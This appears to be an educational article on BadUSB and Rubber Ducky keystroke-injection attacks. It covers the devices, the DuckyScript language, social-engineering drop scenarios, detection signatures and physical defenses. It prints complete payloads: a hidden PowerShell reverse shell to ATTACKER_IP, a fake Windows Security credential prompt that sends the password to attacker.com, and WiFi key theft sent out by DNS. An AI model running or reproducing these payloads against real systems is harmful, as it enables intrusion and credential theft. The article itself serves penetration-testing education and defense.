Bad USB & Rubber Ducky: When Hardware Attacks
You find a USB drive in the parking lot. Curiosity wins. You plug it in. In 3 seconds, before you can even see what's on it, your computer has been compromised. The "flash drive" was never a storage device. It was a weapon.
Deploying BadUSB devices without explicit written authorization is a federal crime under the CFAA. These techniques are for authorized penetration testing only. USB drop attacks in public spaces are illegal regardless of intent.
The Fundamental Vulnerability
Every computer implicitly trusts USB devices. When you plug in a keyboard, the OS doesn't ask "are you sure this is a keyboard?" It just accepts it. This trust is the foundation of every USB attack.
How HID Attacks Work
USB Human Interface Device (HID) attacks exploit the fact that keyboards and mice are automatically trusted. A malicious device presents itself as a keyboard, then "types" pre-programmed commands at superhuman speed—often 1000+ characters per second.
The payload executes in the context of the logged-in user. If they're an admin, so is your payload. The entire attack—from plug-in to compromise—takes 3-15 seconds.
What the Computer Sees
- New USB keyboard connected
- User typing very fast
- Normal PowerShell/cmd execution
- Network connections (if payload calls out)
What Actually Happens
- Malicious microcontroller activates
- Pre-programmed keystrokes fire
- Opens Run dialog (Win+R)
- Executes payload in milliseconds
The Arsenal: Attack Devices
From $5 DIY builds to $200 professional tools, there's a BadUSB for every budget and use case.
The original. Created by Hak5, the Rubber Ducky looks like an ordinary USB flash drive but contains a powerful microcontroller that emulates a keyboard.
Key Features:
- Looks like innocent flash drive
- Uses DuckyScript payload language
- Payloads stored on removable MicroSD
- Cross-platform (Windows, Mac, Linux, Android)
- Instant execution on plug-in
Limitations:
- No bidirectional communication
- Blind injection (can't see screen)
- Must be physically plugged in
The ultimate covert tool. Looks exactly like a standard USB/Lightning cable but contains a WiFi-enabled implant. Leave it on someone's desk—they'll use it to charge their phone. Now you have remote access.
Key Features:
- Indistinguishable from real cables
- WiFi-enabled for remote triggering
- Web interface for payload deployment
- Can exfiltrate keystrokes (keylogger mode)
- Self-destruct capability (wipe payload)
- Geofencing—trigger based on WiFi networks
Attack Scenario: Leave cable at target's desk. Wait until they're logged in and away from keyboard. Trigger payload remotely via phone from parking lot.
Multi-function attack platform. Can emulate keyboard, storage, ethernet adapter, and serial device—often multiple at once. Runs full Linux with Bash scripting.
Key Features:
- Multiple attack modes (HID, Storage, Ethernet)
- Full Debian Linux onboard
- Bash/Python payloads
- Physical switch for payload selection
- LED feedback for attack status
- Can capture credentials via fake ethernet
Killer Feature: Ethernet emulation mode can capture NTLM hashes by presenting as a network device and responding to authentication requests.
Digispark ATtiny85 (~$3)
Tiny Arduino-compatible board. Program with Arduino IDE, deploy as HID device. Cheap enough to be disposable. Limited memory but sufficient for basic payloads.
Raspberry Pi Pico (~$4)
Runs pico-ducky firmware, making it Rubber Ducky compatible. Full DuckyScript support at 1/20th the price. The go-to for budget builds.
Arduino Leonardo/Pro Micro (~$10)
Native USB HID support. More memory and processing power. Can run complex payloads and even act as a keyboard/mouse combo device.
Device Comparison
| Device | Price | Covert | Remote Trigger | Best For |
|---|---|---|---|---|
| Rubber Ducky | $80 | Medium | No | Reliable pentesting |
| O.MG Cable | $180 | Excellent | Yes (WiFi) | Long-term implant |
| Bash Bunny | $120 | Low | No | Complex multi-stage |
| Pi Pico | $4 | Low | No | Budget/disposable |
| Digispark | $3 | Medium | No | Ultra-cheap drops |
DuckyScript: The Payload Language
DuckyScript is the scripting language for Rubber Ducky and compatible devices. Simple, readable, and devastatingly effective.
Basic Commands
REM This is a comment DELAY 1000 // Wait 1 second (milliseconds) STRING Hello World // Type "Hello World" ENTER // Press Enter key GUI r // Windows key + R (Run dialog) ALT F4 // Alt + F4 CTRL ALT DELETE // Ctrl + Alt + Delete TAB // Tab key ESCAPE // Escape key DOWNARROW // Arrow keys available CAPSLOCK // Toggle caps lock
Example Payload: Reverse Shell (Windows)
REM Windows Reverse Shell via PowerShell REM Opens Run dialog, launches PowerShell, connects to attacker DELAY 2000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}" ENTER
Example Payload: Credential Harvester
REM Fake Windows Security prompt to harvest credentials REM Creates convincing login dialog, exfiltrates via webhook DELAY 2000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass ENTER DELAY 1000 STRING $cred = $host.ui.PromptForCredential('Windows Security','Your session has expired. Please re-enter your credentials.',[Environment]::UserName,[Environment]::UserDomainName); ENTER STRING $user = $cred.UserName; $pass = $cred.GetNetworkCredential().Password; ENTER STRING Invoke-WebRequest -Uri "https://attacker.com/log?u=$user&p=$pass" -Method GET ENTER
Example Payload: WiFi Password Exfiltration
REM Extract saved WiFi passwords and exfil via DNS DELAY 2000 GUI r DELAY 500 STRING cmd /c "netsh wlan export profile key=clear folder=%TEMP% && powershell -c \"foreach($f in (gci $env:TEMP\\*.xml)){$x=[xml](gc $f);$n=$x.WLANProfile.name;$k=$x.WLANProfile.MSM.security.sharedKey.keyMaterial;nslookup $n'.'$k'.exfil.attacker.com'}\" && del %TEMP%\\*.xml" ENTER
The DELAY values are critical. Too short and commands fail because windows haven't opened yet. Too long and you waste precious seconds. Test your payloads on identical OS configurations before deployment. Different machines, languages, and security software all affect timing.
Attack Scenarios
Scenario 1: The Parking Lot Drop
Scatter USB drives with company logos in the parking lot, near entrances, or in common areas. Label them enticingly: "Layoff Plans 2024", "Executive Bonuses", "HR Confidential".
Success rate: Studies show 45-98% of dropped USBs get plugged in. The 2016 University of Illinois study found 48% plugged in within hours.
Detection: Physical security cameras, USB device logs, user reports.
Scenario 2: The Evil Charger
Install a modified charging station at a conference, coffee shop, or shared workspace. When targets plug in their phones "to charge," the station injects payloads.
Variant: O.MG cables left at hotel business centers, airport lounges, or "borrowed" to colleagues.
Detection: USB data blocker usage, charging-only cables, awareness training.
Scenario 3: The Tech Support Visit
During a physical penetration test, pose as IT support. "I need to run a quick diagnostic on your machine." Plug in Bash Bunny, capture hashes, exfiltrate data—all while appearing to run legitimate tools.
Detection: Escort policies, badge verification, IT ticket validation.
Scenario 4: Supply Chain Interdiction
Nation-state level: Intercept hardware shipments, implant devices, reship to target. The NSA's COTTONMOUTH program implanted USB devices during transit.
Detection: Tamper-evident packaging, trusted suppliers, hardware attestation.
Detection & Defense
Technical Controls
USB Device Control
- Whitelist approved USB device IDs
- Block USB mass storage entirely
- Require device certificates
- Disable USB ports physically (kiosk mode)
Endpoint Detection
- Monitor for rapid keystroke injection
- Alert on new HID device + immediate shell
- Flag PowerShell within seconds of USB insert
- Behavioral analysis of typing patterns
Detection Signatures
# Windows Event Log - New USB Device Event ID: 6416 (Security) "A new external device was recognized" # PowerShell Logging - Suspicious invocation Event ID: 4104 (PowerShell/Operational) ScriptBlock containing: "Net.Sockets.TCPClient" # Sysmon - Process creation after USB Event ID: 1 (Process Create) ParentImage: explorer.exe Image: *powershell.exe CommandLine: *hidden* OR *bypass* OR *-enc* # USB device insertion followed by: - Win+R (Run dialog) within 5 seconds - PowerShell/cmd spawn within 10 seconds - Network connection within 30 seconds
Physical Defenses
- USB Port Blockers: Physical plastic blockers that prevent insertion
- USB Data Blockers: Charge-only adapters that block data pins
- Epoxy: Fill unused ports with epoxy (extreme but effective)
- Awareness Training: "If you find a USB, report it—don't plug it in"
- Secure Disposal: Provide bins for found USB devices
Technical controls help, but curiosity is hardwired. The most effective defense is a culture where employees know USB attacks exist and report suspicious devices rather than testing them "just to see what's on it."
MITRE ATT&CK Mapping
Lab Exercise
Build Your Own BadUSB
Materials needed:
- Raspberry Pi Pico ($4)
- USB cable
- Computer for programming
Steps:
- Download pico-ducky firmware
- Hold BOOTSEL button while connecting Pico to computer
- Copy the .uf2 firmware file to the Pico drive
- Pico reboots as a CircuitPython device
- Create
payload.ddwith your DuckyScript - Test on YOUR OWN machines only
Safe test payload:
DELAY 2000 GUI r DELAY 500 STRING notepad ENTER DELAY 1000 STRING If you can read this, your BadUSB works! STRING This was a test payload - no malicious activity. ENTER
Only use these techniques in authorized penetration tests with written permission, CTF competitions, or your own lab environment. Deploying BadUSB devices against systems you don't own is a federal crime. "I was just testing" is not a legal defense.